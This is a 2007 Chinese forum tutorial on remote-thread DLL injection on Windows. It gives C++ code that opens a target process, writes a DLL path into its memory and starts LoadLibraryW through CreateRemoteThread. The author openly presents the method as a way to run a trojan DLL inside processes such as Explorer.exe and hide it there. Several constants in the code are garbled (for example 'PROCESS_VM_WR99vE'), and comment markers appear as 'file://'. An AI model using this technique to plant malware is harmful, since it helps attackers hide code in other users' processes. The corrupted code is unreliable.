新书推介:《语义网技术体系》
作者:瞿裕忠,胡伟,程龚
   XML论坛     W3CHINA.ORG讨论区     计算机科学论坛     SOAChina论坛     Blog     开放翻译计划     新浪微博  
 
  • 首页
  • 登录
  • 注册
  • 软件下载
  • 资料下载
  • 核心成员
  • 帮助
  •   Add to Google

    >> 本版讨论高级C/C++编程、代码重构(Refactoring)、极限编程(XP)、泛型编程等话题
    [返回] 计算机科学论坛计算机技术与应用『 C/C++编程思想 』 → 用Visual C++完成远程线程嵌入技术 查看新帖用户列表

      发表一个新主题  发表一个新投票  回复主题  (订阅本版) 您是本帖的第 3822 个阅读者浏览上一篇主题  刷新本主题   树形显示贴子 浏览下一篇主题
     * 贴子主题: 用Visual C++完成远程线程嵌入技术 举报  打印  推荐  IE收藏夹 
       本主题类别:     
     卷积内核 帅哥哟,离线,有人找我吗?
      
      
      威望:8
      头衔:总统
      等级:博士二年级(版主)
      文章:3942
      积分:27590
      门派:XML.ORG.CN
      注册:2004/7/21

    姓名:(无权查看)
    城市:(无权查看)
    院校:(无权查看)
    给卷积内核发送一个短消息 把卷积内核加入好友 查看卷积内核的个人资料 搜索卷积内核在『 C/C++编程思想 』的所有贴子 访问卷积内核的主页 引用回复这个贴子 回复这个贴子 查看卷积内核的博客楼主
    发贴心情 用Visual C++完成远程线程嵌入技术

    远程线程技术指的是通过在另一个进程中创建远程线程的方法进入那个进程的内存地址空间。我们知道,在进程中,可以通过CreateThread函数创建线程,被创建的新线程与主线程(就是进程启动时被同时自动建立的那个线程)共享地址空间以及其他的资源。 但是很少有人知道,通过CreateRemoteThread也同样可以在另一个进程内创建新线程,被创建的远程线程同样可以共享远程进程(是远程进程耶!)的地址空间,所以,实际上,我们通过一个远程线程,进入了远程进程的内存地址空间,也就拥有了那个远程进程相当的权限。例如在远程进程内部启动一个DLL木马(与进入进程内部相比,启动一个DLL木马是小意思,实际上我们可以随意篡改那个远程进程的数据)。

      首先,我们通过OpenProcess 来打开我们试图嵌入的进程(如果远程进程不允许打开,那么嵌入就无法进行了,这往往是由于权限不足引起的,解决方法是通过种种途径提升本地进程的权限)

     hRemoteProcess = OpenProcess( PROCESS_CREATE_THREAD | file://允许远程创建线程


                    PROCESS_VM_OPERATION | file://允许远程VM操作


                    PROCESS_VM_WR99vE,//允许远程VM写


                    FALSE, dwRemoteProcessId )

      由于我们后面需要写入远程进程的内存地址空间并建立远程线程,所以需要申请足够的权限(PROCESS_CREATE_THREAD、VM_OPERATION、VM_WR99vE)。

      然后,我们可以建立LoadLibraryW函数这个线程来启动我们的DLL木马,LoadLibraryW函数是在kernel32.dll中定义的,用来加载DLL文件,它只有一个参数,就是DLL文件的绝对路径名pszLibFileName,(也就是木马DLL的全路径文件名),但是由于木马DLL是在远程进程内调用的,所以我们首先还需要将这个文件名复制到远程地址空间:(否则远程线程是无法读到这个参数的)

     file://计算DLL路径名需要的内存空间


     int cb = (1 + lstrlenW(pszLibFileName)) * sizeof(WCHAR);


     file://使用VirtualAllocEx函数在远程进程的内存地址空间分配DLL文件名缓冲区


     pszLibFileRemote = (PWSTR) VirtualAllocEx( hRemoteProcess, NULL, cb,


                MEM_COMM99v, PAGE_READWR99vE);


     file://使用WriteProcessMemory函数将DLL的路径名复制到远程进程的内存空间


     iReturnCode = WriteProcessMemory(hRemoteProcess,


                pszLibFileRemote, (PVOID) pszLibFileName, cb, NULL);


     file://计算LoadLibraryW的入口地址


     PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)


         GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");

      万事俱备,我们通过建立远程线程时的地址pfnStartAddr(实际上就是LoadLibraryW的入口地址)和传递的参数pszLibFileRemote(实际上是我们复制过去的木马DLL的全路径文件名)在远程进程内启动我们的木马DLL:

     file://启动远程线程LoadLibraryW,通过远程线程调用用户的DLL文件


     hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0,


                     pfnStartAddr, pszLibFileRemote, 0, NULL);

      至此,远程嵌入顺利完成,为了试验我们的DLL是不是已经正常的在远程线程运行,我编写了以下的测试DLL:

     BOOL APIENTRY DllMain(HANDLE hModule, DWORD reason, LPVOID lpReserved)


       {


        char szProcessId[64] ;


        switch ( reason )


         {


          case DLL_PROCESS_ATTACH:


           {


             file://获取当前进程ID


             _itoa ( GetCurrentProcessId(), szProcessId, 10 );


             MessageBox ( NULL, szProcessId, "RemoteDLL", MB_OK );


           }


          default:


          return TRUE;


         }


       }

      当我使用RmtDll.exe程序将这个TestDLL.dll嵌入Explorer.exe进程后(PID=1208),该测试DLL弹出了1208字样的确认框,同时使用PS工具也能看到

       Process ID: 1208


       C:WINNTExplorer.exe (0x00400000)


       ……


       C:TestDLL.dll (0x100000000)


       ……

      这证明TestDLL.dll已经在Explorer.exe进程内正确地运行了。

      无论是使用特洛伊DLL还是使用远程线程,都是让木马的核心代码运行于别的进程的内存空间,这样不仅能很好地隐藏自己,也能更好的保护自己。


       收藏   分享  
    顶(0)
      




    ----------------------------------------------
    事业是国家的,荣誉是单位的,成绩是领导的,工资是老婆的,财产是孩子的,错误是自己的。

    点击查看用户来源及管理<br>发贴IP:*.*.*.* 2007/8/11 11:45:00
     
     GoogleAdSense
      
      
      等级:大一新生
      文章:1
      积分:50
      门派:无门无派
      院校:未填写
      注册:2007-01-01
    给Google AdSense发送一个短消息 把Google AdSense加入好友 查看Google AdSense的个人资料 搜索Google AdSense在『 C/C++编程思想 』的所有贴子 访问Google AdSense的主页 引用回复这个贴子 回复这个贴子 查看Google AdSense的博客广告
    2024/11/26 13:56:40

    本主题贴数1,分页: [1]

    管理选项修改tag | 锁定 | 解锁 | 提升 | 删除 | 移动 | 固顶 | 总固顶 | 奖励 | 惩罚 | 发布公告
    W3C Contributing Supporter! W 3 C h i n a ( since 2003 ) 旗 下 站 点
    苏ICP备05006046号《全国人大常委会关于维护互联网安全的决定》《计算机信息网络国际联网安全保护管理办法》
    957.031ms